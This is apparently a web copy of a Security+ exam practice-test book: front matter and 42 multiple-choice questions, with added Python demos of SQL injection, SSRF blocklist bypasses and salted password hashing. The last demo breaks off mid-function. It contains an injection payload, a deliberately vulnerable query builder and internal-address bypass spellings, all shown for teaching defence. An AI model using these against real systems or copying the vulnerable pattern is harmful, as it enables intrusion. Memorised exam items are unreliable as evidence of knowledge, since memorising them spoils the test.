comptia security+ practice tests - dl1.newoutlook.it
Post on 19-Mar-2023
Table of Contents
Cover
Title Page
Copyright
Dedication
Acknowledgments
About the Author
About the Technical Editor
Introduction
    The Security+ Exam
    Using This Book to Practice
    Exam SY0-601 Exam Objectives
    SY0-601 Certification Exam Objective Map
Chapter 1: Threats, Attacks, and Vulnerabilities
Chapter 2: Architecture and Design
Chapter 3: Implementation
Chapter 4: Operations and Incident Response
Chapter 5: Governance, Risk, and Compliance
Appendix: Answers and Explanations
    Chapter 1: Threats, Attacks, and Vulnerabilities
    Chapter 2: Architecture and Design
    Chapter 3: Implementation
    Chapter 4: Operations and Incident Response
    Chapter 5: Governance, Risk, and Compliance
Index
End User License Agreement
Telegram Channel @nettrain
Copyright © 2021 by John Wiley & Sons, Inc., Indianapolis, Indiana
Published simultaneously in Canada
ISBN: 978-1-119-73546-5
ISBN: 978-1-119-73545-8 (ebk.)
ISBN: 978-1-119-73544-1 (ebk.)
No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior written permission of the Publisher, or authorization through payment of the appropriate per-copy fee to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978) 646-8600. Requests to the Publisher for permission should be addressed to the Permissions Department, John Wiley & Sons, Inc., 111 River Street, Hoboken, NJ 07030, (201) 748-6011, fax (201) 748-6008, or online at www.wiley.com/go/permissions.
Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No warranty may be created or extended by sales or promotional materials. The advice and strategies contained herein may not be suitable for every situation. This work is sold with the understanding that the publisher is not engaged in rendering legal, accounting, or other professional services. If professional assistance is required, the services of a competent professional person should be sought. Neither the publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or Web site is referred to in this work as a citation and/or a potential source of further information does not mean that the author or the publisher endorses the information the organization or Web site may provide or recommendations it may make. Further, readers should be aware that Internet Web sites listed in this work may have changed or disappeared between when this work was written and when it is read.
For general information on our other products and services or to obtain technical support, please contact our Customer Care Department within the U.S. at (877) 762-2974, outside the U.S. at (317) 572-3993 or fax (317) 572-4002.
Wiley publishes in a variety of print and electronic formats and by print-on-demand. Some material included with standard print versions of this book may not be included in e-books or in print-on-demand. If this book refers to media such as a CD or DVD that is not included in the version you purchased, you may download this material at booksupport.wiley.com. For more information about Wiley products, visit www.wiley.com.
Library of Congress Control Number: 2020950198
TRADEMARKS: Wiley, the Wiley logo, and the Sybex logo are trademarks or registered trademarks of John Wiley & Sons, Inc. and/or its affiliates, in the United States and other countries, and may not be used without written permission. CompTIA and Security+ are registered trademarks of CompTIA Properties, LLC. All other trademarks are the property of their respective owners. John Wiley & Sons, Inc. is not associated with any product or vendor mentioned in this book.
This book is dedicated to Mike Chapple, who helped me get my start in the writing field. After most of a decade writing together, this is my first entirely solo project. Mike, thank you for helping me get my start almost a decade ago, for encouraging me along the way, and for continuing to challenge me to do more each time we take on another book.
—David
Acknowledgments
Books like this involve work from many people who put countless hours of time and effort into producing them from concept to final printed and electronic copies. The hard work and dedication of the team at Wiley always shows. I especially want to acknowledge and thank senior acquisitions editor Kenyon Brown, who continues to be a wonderful person to work with on book after book.
I also greatly appreciated the editing and production team for the book, including Tom Dinse, the project editor, who brought years of experience and great talent to the project; Chris Crayton, the technical editor, who provided insightful advice and gave wonderful feedback throughout the book; and Saravanan Dakshinamurthy, the production editor, who guided me through layouts, formatting, and final cleanup to produce a great book. I would also like to thank the many behind-the-scenes contributors, including the graphics, production, and technical teams who make the book and companion materials into a finished product.
My agent, Carole Jelen of Waterside Productions, continues to provide us with wonderful opportunities, advice, and assistance throughout our writing careers.
Finally, I want to thank my friends and family, who have supported me through the late evenings, busy weekends, and long hours that a book like this requires to write, edit, and get to press.
About the Author
David Seidl is vice president for information technology and CIO at Miami University, where he is responsible for IT for Miami University. During his IT career, he has served in a variety of technical and information security roles, including serving as the senior director for Campus Technology Services at the University of Notre Dame, where he co-led Notre Dame's move to the cloud and oversaw cloud operations, ERP, databases, identity management, and a broad range of other technologies and services. Prior to his senior leadership roles at Notre Dame, he served as Notre Dame's director of information security and led Notre Dame's information security program. He taught information security and networking undergraduate courses as an instructor for Notre Dame's Mendoza College of Business and has written books on security certification and cyberwarfare, including coauthoring CISSP (ISC)2 Official Practice Tests (Sybex, 2018) as well as the current and previous editions of the CompTIA CySA+ Study Guide: Exam CS0-002 (Wiley, 2020, Chapple/Seidl) and CompTIA CySA+ Practice Tests: Exam CS0-002 (Wiley, 2020, Chapple/Seidl).
David holds a bachelor's degree in communication technology and a master's degree in information security from Eastern Michigan University, as well as CISSP, CySA+, Pentest+, GPEN, and GCIH certifications.
About the Technical Editor
Chris Crayton, MSCE, CISSP, CySA+, A+, N+, S+, is a technical consultant, trainer, author, and industry-leading technical editor. He has worked as a computer technology and networking instructor, information security director, network administrator, network engineer, and PC specialist. Chris has served as technical editor and content contributor on numerous technical titles for several of the leading publishing companies. He has also been recognized with many professional and teaching awards.
Introduction
CompTIA Security+ Practice Tests: Exam SY0-601, Second Edition is the perfect companion volume to the CompTIA Security+ Study Guide: Exam SY0-601, Eighth Edition (Wiley, 2020, Chapple/Seidl). If you're looking to test your knowledge before you take the Security+ exam, this book will help you by providing a combination of 1,100 questions that cover the Security+ domains and easy-to-understand explanations of both right and wrong answers.
If you're just starting to prepare for the Security+ exam, we highly recommend that you use the CompTIA Security+ Study Guide, Eighth Edition to help you learn about each of the domains covered by the Security+ exam. Once you're ready to test your knowledge, use this book to help find places where you may need to study more or to practice for the exam itself.
Since this is a companion to the Security+ Study Guide, this book is designed to be similar to taking the Security+ exam. The book itself is broken up into seven chapters: five domain-centric chapters with questions about each domain, and two chapters that contain 100-question practice tests to simulate taking the Security+ exam itself.
If you can answer 90 percent or more of the questions for a domain correctly, you can feel safe moving on to the next chapter. If you're unable to answer that many correctly, reread the chapter and try the questions again. Your score should improve.
Don't just study the questions and answers! The questions on the actual exam will be different from the practice questions included in this book. The exam is designed to test your knowledge of a concept or objective, so use this book to learn the objectives behind the questions.
The Security+ Exam
The Security+ exam is designed to be a vendor-neutral certification for cybersecurity professionals and those seeking to enter the field. CompTIA recommends this certification for those currently working, or aspiring to work, in roles, including:
Systems administrator
Security administrator
Security specialist
Security engineer
Network administrator
Junior IT auditor/penetration tester
Security consultant
The exam covers five major domains:
1. Threats, Attacks, and Vulnerabilities
2. Architecture and Design
3. Implementation
4. Operations and Incident Response
5. Governance, Risk, and Compliance
These five areas include a range of topics, from firewall design to incident response and forensics, while focusing heavily on scenario-based learning. That's why CompTIA recommends that those attempting the exam have at least two years of hands-on work experience, although many individuals pass the exam before moving into their first cybersecurity role.
The Security+ exam is conducted in a format that CompTIA calls “performance-based assessment.” This means that the exam combines standard multiple-choice questions with other, interactive question formats. Your exam may include multiple types of questions, such as multiple-choice, fill-in-the-blank, multiple-response, drag-and-drop, and image-based problems.
CompTIA recommends that test takers have two years of information security–related experience before taking this exam. The exam costs $349 in the United States, with roughly equivalent prices in other locations around the globe. More details about the Security+ exam and how to take it can be found here: www.comptia.org/certifications/security
This book includes a discount code for the Security+ exam—make sure you use it!
You'll have 90 minutes to take the exam and will be asked to answer up to 90 questions during that time period. Your exam will be scored on a scale ranging from 100 to 900, with a passing score of 750.
You should also know that CompTIA is notorious for including vague questions on all of its exams. You might see a question for which two of the possible four answers are correct—but you can choose only one. Use your knowledge, logic, and intuition to choose the best answer and then move on. Sometimes, the questions are worded in ways that would make English majors cringe—a typo here, an incorrect verb there. Don't let this frustrate you; answer the question and move on to the next one.
CompTIA frequently does what is called item seeding, which is the practice of including unscored questions on exams. It does so to gather psychometric data, which is then used when developing new versions of the exam. Before you take the exam, you will be told that your exam may include these unscored questions. So, if you come across a question that does not appear to map to any of the exam objectives—or for that matter, does not appear to belong in the exam—it is likely a seeded question. You never know whether or not a question is seeded, however, so always make your best effort to answer every question.
Taking the Exam
Once you are fully prepared to take the exam, you can visit the CompTIA website to purchase your exam voucher: www.comptiastore.com/Articles.asp?ID=265&category=vouchers
CompTIA partners with Pearson VUE's testing centers, so your next step will be to locate a testing center near you. In the United States, you can do this based on your address or your ZIP code, whereas non-U.S. test takers may find it easier to enter their city and country. You can search for a test center near you at the Pearson VUE website, where you will need to navigate to “Find a test center.” www.pearsonvue.com/comptia
Now that you know where you'd like to take the exam, simply set up a Pearson VUE testing account and schedule an exam: home.pearsonvue.com/comptia/onvue
On the day of the test, take two forms of identification, and make sure to show up with plenty of time before the exam starts. Remember that you will not be able to take your notes, electronic devices (including smartphones and watches), or other materials in with you, and that other requirements may exist for the test. Make sure you review those requirements before the day of your test so you're fully prepared for both the test itself as well as the testing process and facility rules.
After the Security+ Exam
Once you have taken the exam, you will be notified of your score immediately, so you'll know if you passed the test right away. You should keep track of your score report with your exam registration records and the email address you used to register for the exam.
Maintaining Your Certification
CompTIA certifications must be renewed on a periodic basis. To renew your certification, you can pass the most current version of the exam, earn a qualifying higher-level CompTIA or industry certification, or complete sufficient continuing education activities to earn enough continuing education units (CEUs) to renew it.
CompTIA provides information on renewals via their website at: www.comptia.org/continuing-education
When you sign up to renew your certification, you will be asked to agree to the CE program's Code of Ethics, to pay a renewal fee, and to submit the materials required for your chosen renewal method.
A full list of the industry certifications you can use to acquire CEUs toward renewing the Security+ can be found at: www.comptia.org/continuing-education/choose/renew-with-a-single-
Using This Book to Practice
This book is composed of seven chapters with over 1,000 practice test questions. Each of the first five chapters covers a domain, with a variety of questions that can help you test your knowledge of real-world, scenario, and best practices–based security knowledge. The final two chapters are complete practice exams that can serve as timed practice tests to help determine whether you're ready for the Security+ exam.
We recommend taking the first practice exam to help identify where you may need to spend more study time and then using the domain-specific chapters to test your domain knowledge where it is weak. Once you're ready, take the second practice exam to make sure you've covered all the material and are ready to attempt the Security+ exam.
As you work through questions in this book, you will encounter tools and technology that you may not be familiar with. If you find that you are facing a consistent gap or that a domain is particularly challenging, we recommend spending some time with books and materials that tackle that domain in depth. This approach can help you fill in gaps and help you be more prepared for the exam.
To access our interactive test bank and online learning environment, simply visit www.wiley.com/go/sybextestprep, register to receive your unique PIN, and instantly gain one year of FREE access after activation to the interactive test bank with 2 practice exams and hundreds of domain-by-domain questions. Over 1,000 questions total!
Exam SY0-601 Exam Objectives
CompTIA goes to great lengths to ensure that its certification programs accurately reflect the IT industry's best practices. They do this by establishing committees for each of its exam programs. Each committee consists of a small group of IT professionals, training providers, and publishers who are responsible for establishing the exam's baseline competency level and who determine the appropriate target-audience level.
Once these factors are determined, CompTIA shares this information with a group of hand-selected subject matter experts (SMEs). These folks are the true brainpower behind the certification program. The SMEs review the committee's findings, refine them, and shape them into the objectives that follow this section. CompTIA calls this process a job-task analysis (JTA).
Finally, CompTIA conducts a survey to ensure that the objectives and weightings truly reflect job requirements. Only then can the SMEs go to work writing the hundreds of questions needed for the exam. Even so, they have to go back to the drawing board for further refinements in many cases before the exam is ready to go live in its final state. Rest assured that the content you're about to learn will serve you long after you take the exam.
CompTIA also publishes relative weightings for each of the exam's objectives. The following table lists the five Security+ objective domains and the extent to which they are represented on the exam.

Domain                                       % of Exam
1.0 Threats, Attacks, and Vulnerabilities    24%
2.0 Architecture and Design                  21%
3.0 Implementation                           25%
4.0 Operations and Incident Response         16%
5.0 Governance, Risk, and Compliance         14%
SY0-601 Certification Exam Objective Map

Objective  Chapter

1.0 Threats, Attacks and Vulnerabilities
1.1 Compare and contrast different types of social engineering techniques  Chapter 1
1.2 Given a scenario, analyze potential indicators to determine the type of attack  Chapter 1
1.3 Given a scenario, analyze potential indicators associated with application attacks  Chapter 1
1.4 Given a scenario, analyze potential indicators associated with network attacks  Chapter 1
1.5 Explain different threat actors, vectors, and intelligence sources  Chapter 1
1.6 Explain the security concerns associated with various types of vulnerabilities  Chapter 1
1.7 Summarize the techniques used in security assessments  Chapter 1
1.8 Explain the techniques used in penetration testing  Chapter 1

2.0 Architecture and Design
2.1 Explain the importance of security concepts in an enterprise environment  Chapter 2
2.2 Summarize virtualization and cloud computing concepts  Chapter 2
2.3 Summarize secure application development, deployment, and automation concepts  Chapter 2
2.4 Summarize authentication and authorization design concepts  Chapter 2
2.5 Given a scenario, implement cybersecurity resilience  Chapter 2
2.6 Explain the security implications of embedded and specialized systems  Chapter 2
2.7 Explain the importance of physical security controls  Chapter 2
2.8 Summarize the basics of cryptographic concepts  Chapter 2

3.0 Implementation
3.1 Given a scenario, implement secure protocols  Chapter 3
3.2 Given a scenario, implement host or application security solutions  Chapter 3
3.3 Given a scenario, implement secure network designs  Chapter 3
3.4 Given a scenario, install and configure wireless security settings  Chapter 3
3.5 Given a scenario, implement secure mobile solutions  Chapter 3
3.6 Given a scenario, apply cybersecurity solutions to the cloud  Chapter 3
3.7 Given a scenario, implement identity and account management controls  Chapter 3
3.8 Given a scenario, implement authentication and authorization solutions  Chapter 3
3.9 Given a scenario, implement public key infrastructure  Chapter 3

4.0 Operations and Incident Response
4.1 Given a scenario, use the appropriate tool to assess organizational security  Chapter 4
4.2 Summarize the importance of policies, processes, and procedures for incident response  Chapter 4
4.3 Given an incident, utilize appropriate data sources to support an investigation  Chapter 4
4.4 Given an incident, apply mitigation techniques or controls to secure an environment  Chapter 4
4.5 Explain the key aspects of digital forensics  Chapter 4

5.0 Governance, Risk, and Compliance
5.1 Compare and contrast various types of controls  Chapter 5
5.2 Explain the importance of applicable regulations, standards, or frameworks that impact organizational security posture  Chapter 5
5.3 Explain the importance of policies to organizational security  Chapter 5
5.4 Summarize risk management processes and concepts  Chapter 5
5.5 Explain privacy and sensitive data concepts in relation to security  Chapter 5

Exam objectives are subject to change at any time without prior notice and at CompTIA's discretion. Please visit CompTIA's website (www.comptia.org) for the most current listing of exam objectives.
Chapter 1: Threats, Attacks, and Vulnerabilities
THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:
1.1 Compare and contrast different types of social engineering techniques
1.2 Given a scenario, analyze potential indicators to determine the type of attack
1.3 Given a scenario, analyze potential indicators associated with application attacks
1.4 Given a scenario, analyze potential indicators associated with network attacks
1.5 Explain different threat actors, vectors, and intelligence sources
1.6 Explain the security concerns associated with various types of vulnerabilities
1.7 Summarize the techniques used in security assessments
1.8 Explain the techniques used in penetration testing
1. Ahmed is a sales manager with a major insurance company. He has received an email that is encouraging him to click on a link and fill out a survey. He is suspicious of the email, but it does mention a major insurance association, and that makes him think it might be legitimate. Which of the following best describes this attack?
A. Phishing
B. Social engineering
C. Spear phishing
D. Trojan horse
2. You are a security administrator for a medium-sized bank. You have discovered a piece of software on your bank's database server that is not supposed to be there. It appears that the software will begin deleting database files if a specific employee is terminated. What best describes this?
A. Worm
B. Logic bomb
C. Trojan horse
D. Rootkit
3. You are responsible for incident response at Acme Bank. The Acme Bank website has been attacked. The attacker used the login screen, but rather than enter login credentials, they entered some odd text: ' or '1'='1. What is the best description for this attack?
A. Cross-site scripting
B. Cross-site request forgery
C. SQL injection
D. ARP poisoning
4. Users are complaining that they cannot connect to the wireless network. You discover that the WAPs are being subjected to a wireless attack designed to block their Wi-Fi signals. Which of the following is the best label for this attack?
A. IV attack
B. Jamming
C. WPS attack
D. Botnet
5. Frank is deeply concerned about attacks to his company's e-commerce server. He is particularly worried about cross-site scripting and SQL injection. Which of the following would best defend against these two specific attacks?
A. Encrypted web traffic
B. Input validation
C. A firewall
D. An IDS
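Questions 3 and 5 turn on what the text ' or '1'='1 actually does to a login query and on why input validation and query parameterization stop it. The following is an added example written for this page, not code from the book or from any product it mentions. It builds a constructed in-memory SQLite table with one account (the username, password and the account naming rule are assumptions), runs the payload through a query assembled by string formatting and through a parameterized one, and adds an allowlist check on the username as the validation layer. Passwords are stored in clear here only so the injected SQL stays readable; a real store hashes them (question 8).

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: one account in an in-memory database (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return conn


def build_vulnerable_query(username, password):
    """Untrusted input is spliced into the SQL text. A single quote in the input
    closes the string literal and everything after it is parsed as SQL."""
    return ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    # With password = "' or '1'='1" the WHERE clause becomes
    #   username = 'nobody' AND password = '' or '1'='1'
    # and because AND binds tighter than OR, the always-true '1'='1' wins.
    return conn.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0


def safe_login(conn, username, password):
    """Parameterized query: the driver sends the values separately from the SQL
    text, so the payload is compared as a literal string and never parsed."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")  # assumed account naming policy


def validated_login(conn, username, password):
    """Input validation (question 5) as an extra layer: reject anything that is
    not a plausible username before it reaches the database. The password is
    deliberately not restricted (users may choose quotes), so the query itself
    still has to be parameterized; validation alone is not the fix."""
    if not USERNAME_RE.match(username):
        return False
    return safe_login(conn, username, password)


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print(build_vulnerable_query("nobody", payload))
    print("vulnerable:", vulnerable_login(db, "nobody", payload))   # True: bypassed
    print("parameterized:", safe_login(db, "nobody", payload))      # False
    print("validated:", validated_login(db, payload, "x"))          # False
```

The tell in the rendered query is the unbalanced-looking but syntactically valid `password = '' or '1'='1'`; when a web log shows a quote followed by `or` in a login parameter, that is the indicator the question describes.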
6. You are responsible for network security at Acme Company. Users have been reporting that personal data is being stolen when using the wireless network. They all insist they only connect to the corporate wireless access point (AP). However, logs for the AP show that these users have not connected to it. Which of the following could best explain this situation?
A. Session hijacking
B. Clickjacking
C. Rogue access point
D. Bluejacking
7. What type of attack depends on the attacker entering JavaScript into a text area that is intended for users to enter text that will be viewed by other users?
A. SQL injection
B. Clickjacking
C. Cross-site scripting
D. Bluejacking
8. Rick wants to make offline brute-force attacks against his password file very difficult for attackers. Which of the following is not a common technique to make passwords harder to crack?
A. Use of a salt
B. Use of a pepper
C. Use of a purpose-built password hashing algorithm
D. Encrypting password plain text using symmetric encryption
9. What term is used to describe spam over Internet messaging services?
A. SPIM
B. SMSPAM
C. IMSPAM
D. TwoFaceTiming
10. Susan is analyzing the source code for an application and discovers a pointer dereference where the pointer can be NULL. This causes the program to attempt to read from the NULL pointer and results in a segmentation fault. What impact could this have for the application?
A. A data breach
B. A denial-of-service condition
C. Permissions creep
D. Privilege escalation
11. Teresa is the security manager for a mid-sized insurance company. She receives a call from law enforcement, telling her that some computers on her network participated in a massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her company would be involved in a cybercrime. What would best explain this scenario?
A. It is a result of social engineering.
B. The machines all have backdoors.
C. The machines are bots.
D. The machines are infected with crypto-viruses.
12. Unusual outbound network traffic, geographical irregularities, and increases in database read volumes are all examples of what key element of threat intelligence?
A. Predictive analysis
B. OSINT
C. Indicators of compromise
D. Threat maps
13. Chris needs visibility into connection attempts through a firewall because he believes that a TCP handshake is not properly occurring. What security information and event management (SIEM) capability is best suited to troubleshooting this issue?
A. Reviewing reports
B. Packet capture
C. Sentiment analysis
D. Log collection and analysis
14. Chris wants to detect a potential insider threat using his security information and event management (SIEM) system. What capability best matches his needs?
A. Sentiment analysis
B. Log aggregation
C. Security monitoring
D. User behavior analysis
15. Chris has hundreds of systems spread across multiple locations and wants to better handle the amount of data that they create. What two technologies can help with this?
A. Log aggregation and log collectors
B. Packet capture and log aggregation
C. Security monitoring and log collectors
D. Sentiment analysis and user behavior analysis
16. What type of security team establishes the rules of engagement for a cybersecurity exercise?
A. Blue team
B. White team
C. Purple team
D. Red team
17. Cynthia is concerned about attacks against an application programming interface (API) that her company provides for its customers. What should she recommend to ensure that the API is only used by customers who have paid for the service?
A. Require authentication.
B. Install and configure a firewall.
C. Filter by IP address.
D. Install and use an IPS.
18. What type of attack is based on sending more data to a target variable than the data can actually hold?
A. Bluesnarfing
B. Buffer overflow
C. Bluejacking
D. Cross-site scripting
19. An email arrives telling Gurvinder that there is a limited time to act to get a software package for free and that the first 50 downloads will not have to be paid for. What social engineering principle is being used against him?
A. Scarcity
B. Intimidation
C. Authority
D. Consensus
20. You have been asked to test your company network for security issues. The specific test you are conducting involves primarily using automated and semiautomated tools to look for known vulnerabilities with the various systems on your network. Which of the following best describes this type of test?
A. Vulnerability scan
B. Penetration test
C. Security audit
D. Security test
21. Susan wants to reduce the likelihood of successful credential harvesting attacks via her organization's commercial websites. Which of the following is not a common prevention method aimed at stopping credential harvesting?
A. Use of multifactor authentication
B. User awareness training
C. Use of complex usernames
D. Limiting or preventing use of third-party web scripts and plugins
22. Greg wants to gain admission to a network that is protected by a network access control (NAC) system that recognizes the hardware address of systems. How can he bypass this protection?
A. Spoof a legitimate IP address.
B. Conduct a denial-of-service attack against the NAC system.
C. Use MAC cloning to clone a legitimate MAC address.
D. None of the above
23. Coleen is the web security administrator for an online auction website. A small number of users are complaining that when they visit the website it does not appear to be the correct site. Coleen checks and she can visit the site without any problem, even from computers outside the network. She also checks the web server log and there is no record of those users ever connecting. Which of the following might best explain this?
A. Typosquatting
B. SQL injection
C. Cross-site scripting
D. Cross-site request forgery
24. The organization that Mike works in finds that one of their domains is directing traffic to a competitor's website. When Mike checks, the domain information has been changed, including the contact and other administrative details for the domain. If the domain had not expired, what has most likely occurred?
A. DNS hijacking
B. An on-path attack
C. Domain hijacking
D. A zero-day attack
25. Mahmoud is responsible for managing security at a large university. He has just performed a threat analysis for the network, and based on past incidents and studies of similar networks, he has determined that the most prevalent threat to his network is low-skilled attackers who wish to breach the system, simply to prove they can or for some low-level crime, such as changing a grade. Which term best describes this type of attacker?
A. Hacktivist
B. Amateur
C. Insider
D. Script kiddie
26. How is phishing different from general spam?
A. It is sent only to specific targeted individuals.
B. It is intended to acquire credentials or other data.
C. It is sent via SMS.
D. It includes malware in the message.
27. Which of the following best describes a collection of computers that have been compromised and are being controlled from one central point?
A. Zombienet
B. Botnet
C. Nullnet
D. Attacknet
28. Selah includes a question in her procurement request-for-proposal process that asks how long the vendor has been in business and how many existing clients the vendor has. What common issue is this practice intended to help prevent?
A. Supply chain security issues
B. Lack of vendor support
C. Outsourced code development issues
D. System integration problems
29. John is conducting a penetration test of a client's network. He is currently gathering information from sources such as archive.org, netcraft.com, social media, and information websites. What best describes this stage?
A. Active reconnaissance
B. Passive reconnaissance
C. Initial exploitation
D. Pivot
30. Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing them?
A. Removing all SQL code from submitted HTTP queries
B. Blocking hostnames like 127.0.0.1 and localhost
C. Blocking sensitive URLs like /admin
D. Applying whitelist-based input filters
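Question 30 contrasts blocklisting a few hostnames and paths with an allowlist-based filter. The difference is easiest to see in code, so the following is an added example for this page (not from the book or any product it names). It assumes an application that only needs to fetch from two hosts and a resolver that can be swapped for a fake so the check runs offline; the hostnames, the fake DNS answers and the hard-coded blocklist are all constructed. The bypass it shows is real: `socket.inet_aton`, like the C library behind curl and browsers, accepts `127.1`, `127.0.01` and the decimal form `2130706433` as spellings of 127.0.0.1, none of which match a blocklist entry for the literal string.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumptions for the demo: the only outbound destinations the app legitimately needs.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}


def canonical_ip(host):
    """Return an ip_address for any spelling of an IP literal, or None for a name.

    ipaddress only parses dotted quads and IPv6; socket.inet_aton also parses the
    classic shorthand forms ("127.1", "127.0.01", "2130706433") that HTTP
    clients accept, which is exactly what a string blocklist misses.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None


def is_internal(ip):
    """Loopback, RFC 1918, link-local (which covers the 169.254.169.254 cloud
    metadata endpoint), multicast, reserved and unspecified ranges."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def blocklist_check(url):
    """Options B and C: reject a few bad-looking strings. Shown only to be broken."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    if host in {"127.0.0.1", "localhost", "::1"}:
        return False
    if p.path.startswith("/admin"):
        return False
    return True


def blocklist_bypass(url):
    """If the blocklist accepts the URL but it really targets an internal
    address, return that address as a string; otherwise None."""
    if not blocklist_check(url):
        return None
    ip = canonical_ip(urlparse(url).hostname or "")
    return str(ip) if ip is not None and is_internal(ip) else None


def allowlist_check(url, resolve=socket.gethostbyname):
    """Option D: accept only a known scheme and a known host, then confirm the
    name resolves to a public address so a rebinding record cannot point inward."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES or not p.hostname:
        return False
    host = p.hostname.lower()
    if host not in ALLOWED_HOSTS:
        return False
    try:
        ip = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError):
        return False
    return not is_internal(ip)


if __name__ == "__main__":
    for u in ("http://127.0.0.1/", "http://127.1/", "http://2130706433/",
              "http://169.254.169.254/latest/meta-data/"):
        print(u, "blocklist accepts:", blocklist_check(u), "really hits:", blocklist_bypass(u))
    fake = lambda h: {"api.example.com": "93.184.216.34"}[h]   # constructed DNS answer
    print(allowlist_check("https://api.example.com/v1", resolve=fake))
    print(allowlist_check("https://api.example.com/v1", resolve=lambda h: "127.0.0.1"))
```

The resolve-then-check step still has a window: the HTTP client resolves the name again when it connects. Pass the validated IP to the client (or resolve once and pin it) and disable redirect following, since a 302 from an allowlisted host is another way to point the request at an internal address.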
31. What type of attack is based on entering fake entries into a target network's domain name server?
A. DNS poisoning
B. ARP poisoning
C. XSS poisoning
D. CSRF poisoning
32. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the test, he has only been given the company name, the domain name for their website, and the IP address of their gateway router. What best describes this type of test?
A. A known environment test
B. External test
C. An unknown environment test
D. Threat test
33. You work for a security company that performs penetration testing for clients. You are conducting a test of an e-commerce company. You discover that after compromising the web server, you can use the web server to launch a second attack into the company's internal network. What best describes this?
A. Internal attack
B. Known environment testing
C. Unknown environment testing
D. A pivot
34. While investigating a malware outbreak on your company network, you discover something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner to help compromise the system, and it appears that applications have been attaching to this file, rather than the real system DLL. What best describes this?
A. Shimming
B. Trojan horse
C. Backdoor
D. Refactoring
35. Which of the following capabilities is not a key part of a SOAR (security orchestration, automation, and response) tool?
A. Threat and vulnerability management
B. Security incident response
C. Automated malware analysis
D. Security operations automation
36. John discovers that email from his company's email servers is being blocked because of spam that was sent from a compromised account. What type of lookup can he use to determine what vendors like McAfee and Barracuda have classified his domain as?
A. An nslookup
B. A tcpdump
C. A domain reputation lookup
D. An SMTP whois
37. Frank is a network administrator for a small college. He discovers that several machines on his network are infected with malware. That malware is sending a flood of packets to a target external to the network. What best describes this attack?
A. SYN flood
B. DDoS
C. Botnet
D. Backdoor
38. Why is SSL stripping a particular danger with open Wi-Fi networks?
A. WPA2 is not secure enough to prevent this.
B. Open hotspots do not assert their identity in a secure way.
C. Open hotspots can be accessed by any user.
D. 802.11ac is insecure and traffic can be redirected.
39. A sales manager at your company is complaining about slow performance on his computer. When you thoroughly investigate the issue, you find spyware on his computer. He insists that the only thing he has downloaded recently was a freeware stock trading application. What would best explain this situation?
A. Logic bomb
B. Trojan horse
C. Rootkit
D. Macro virus
40. When phishing attacks are so focused that they target a specific high-ranking or important individual, they are called what?
A. Spear phishing
B. Targeted phishing
C. Phishing
D. Whaling
41. What type of threat actors are most likely to have a profit motive for their malicious activities?
A. State actors
B. Script kiddies
C. Hacktivists
D. Criminal syndicates
42. One of your users cannot recall the password for their laptop. You want to recover that password for them. You intend to use a tool/technique that is popular with hackers, and it consists of searching tables of precomputed hashes to recover the password. What best describes this?
A. Rainbow table
B. Backdoor
C. Social engineering
D. Dictionary attack
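Question 8 lists the usual defences for a stored password file and question 42 describes the attack those defences are aimed at: looking a captured hash up in a table of precomputed hashes. The following is an added example for this page, not code from the book or any tool it names. It builds the attacker's precomputed table for a constructed five-word list (a real rainbow table stores hash chains to save space, but a dictionary makes the same point), then shows the defender's side: a random per-user salt, a site-wide pepper kept outside the database, and a purpose-built slow key derivation function. PBKDF2 from the standard library stands in for the usual choice of Argon2id, bcrypt or scrypt so the block runs without third-party packages; the wordlist, pepper and iteration count are assumptions.

```python
import hashlib
import hmac
import os

# Constructed inputs (assumptions for the demo).
WORDLIST = ["password", "123456", "letmein", "correct horse", "hunter2"]
PEPPER = b"site-wide-secret-kept-in-a-vault-not-in-the-db"
ITERATIONS = 200_000


def unsalted_sha256_hex(password):
    """What a naive password store does: one deterministic digest per password,
    identical for every user who picked that password and on every site."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed_table(words):
    """Attacker side (question 42): hash the candidate list once, keep digest -> word."""
    return {unsalted_sha256_hex(w): w for w in words}


def lookup(table, digest_hex):
    """Cracking by lookup: no hashing at attack time, one dict probe per target."""
    return table.get(digest_hex)


def hash_password(password, salt=None, pepper=PEPPER):
    """Defender side (question 8). Returns (salt, digest).

    salt:   16 random bytes per user, stored beside the digest. Two users with the
            same password get different digests, and a table built in advance is
            useless because the attacker could not know the salt when building it.
    pepper: one secret for the whole site, mixed in but never stored in the
            database, so a dumped table alone is not enough to start cracking.
    KDF:    PBKDF2-HMAC-SHA256 with a high iteration count makes each guess slow.
    """
    if salt is None:
        salt = os.urandom(16)
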